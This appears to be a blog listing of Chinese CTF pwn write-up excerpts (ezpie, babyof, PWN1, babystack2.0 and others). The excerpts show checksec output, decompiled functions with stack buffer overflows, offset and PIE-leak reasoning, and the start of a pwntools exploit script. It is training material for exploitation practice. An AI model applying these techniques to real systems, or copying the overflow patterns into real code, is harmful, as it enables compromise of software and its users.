NISACTF 2022-ezpie
32位开启了pie保护
IDA中值得注意的三个函数 vuln函数中return read(0, buf, 0x50u);栈溢出 offset = 0x28+0x8
由于开了pie保护 ida中的基本函数地址不可用 所以我们可以要算出函数的偏移
通过什么泄露呢?
由于Partial RELRO got表可以泄露 能不能算出libc呢?
!他给了一个gift 每次运行都会泄露main的地址
1234OHHH!,give you a gift![DEBUG] Received 0x13 bytes: b'\n' b'0x565ef770\n' b'Input:\n'
1234OHHH!,give you a gift![DEBUG] Received 0x13 bytes: b'\n' b'0x565d8770\n' b'Input:\n'
通过ida可以知道 770是函数的偏移量 所以每次的基地址就是770前面的内容 ...
NISACTF 2022-ReorPwn?
fun函数主要做了反转 可以看到
开了一堆保护 80%是直接在shell上做文章 可以看到这里并没有做任何过滤 所以我们直接
得到答案 很简单对吧
ciscn_2019_c_1
123456[*] '/mnt/e/work/PWN/buuctf/ciscn_2019_c_1/pwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)
ida64main123456789101112131415161718192021222324252627282930313233343536373839int __cdecl main(int argc, const char **argv, const char **envp){ int v4; // [rsp+Ch] [rbp-4h] BYREF init(); puts("EEEEEEE hh iii "); puts("EE ...
复读机
1234567└─# checksec pwn [*] '/mnt/e/work/PWN/buuctf/jarvisoj_level2_x64/pwn' Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)
狗屎开了NX 又是一眼shellcode不就是叫你踩坑吗 服了
// IDA decompilation of main() from the jarvisoj_level2_x64 binary.
// checksec above: NX enabled, no canary, no PIE, no RELRO.
int __cdecl main(int argc, const char **argv, const char **envp)
{
    // The stack buffer (char buf[128], per the excerpt below) lives in
    // vulnerable_function(); its body is only partially shown on this page.
    vulnerable_function(argc, argv, envp);
    // system() is linked into the binary; with NX this, not injected
    // shellcode, is why the writeup treats the overflow as exploitable.
    return system("echo 'Hello World!'");
}
1234567ssize_t vulnerable_function(){ char buf[128] ...
福建数据安全大赛初赛
123456789101112131415161718192021222324from pwn import *from LibcSearcher import *context( terminal=["wt.exe","wsl"], os = "linux", arch = "amd64", #arch = "i386", log_level="debug",)elf = ELF("./pwn")io = process("./pwn")#io = remote("node4.anna.nssctf.cn",28444)def debug(): gdb.attach(io) pause()#debug()backdoor_addr = elf.sym['Xiao_Si']puts = elf.got['puts']offset ...
2021 鹤城杯-babyof
123456[*] '/mnt/e/work/PWN/nssctf/469_[2021 鹤城杯]babyof/pwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)
64位直接扔ida64
开启了Partial RELRO和 NX
ida64找到sub_400632
// sub_400632 is not a real symbol name; it is the address label IDA
// assigned to this function (2021 鹤城杯 babyof).
int sub_400632()
{
    char buf[64]; // [rsp+0h] [rbp-40h] BYREF
    puts("Do you know how to do buffer overflow?");
    // Reads up to 0x100 bytes into a 64-byte stack buffer with no canary
    // (see checksec above): a plain stack overflow. A fixed build would
    // bound the read by sizeof buf.
    read(0, buf, 0x100uLL);
    return puts("I hope you win");
}
// … excerpt truncated here …
CISCN 2019华北-PWN1
123456[*] '/mnt/e/work/PWN/nssctf/100/[CISCN 2019华北]PWN1' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)
// IDA decompilation of main() from the [CISCN 2019华北]PWN1 binary.
int __cdecl main(int argc, const char **argv, const char **envp)
{
    // Mode 2 is presumably _IONBF (glibc), i.e. unbuffered I/O so prompts
    // arrive immediately over a pipe or socket. IDA labels the first
    // stream _bss_start; it most likely aliases stdout — confirm in IDA.
    setvbuf(_bss_start, 0LL, 2, 0LL);
    setvbuf(stdin, 0LL, 2, 0LL);
    // All input handling happens in func(); see the excerpt below.
    func();
    return 0;
}
查看func()
12345678910111213int func(){ char v1[44]; // [rsp+0h] [rbp-30h] BYREF float v2; // [rsp+2Ch] [rb ...
BJDCTF 2020_babystack2.0
[BJDCTF 2020]babystack2.0123456[*] '/mnt/e/work/PWN/nssctf/709_[BJDCTF 2020]babystack2.0/pwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)
ida6412345678910111213141516171819202122232425int __cdecl main(int argc, const char **argv, const char **envp){ char buf[12]; // [rsp+0h] [rbp-10h] BYREF size_t nbytes; // [rsp+Ch] [rbp-4h] BYREF setvbuf(_bss_start, 0LL, 2, 0LL); setvbuf(stdin, 0 ...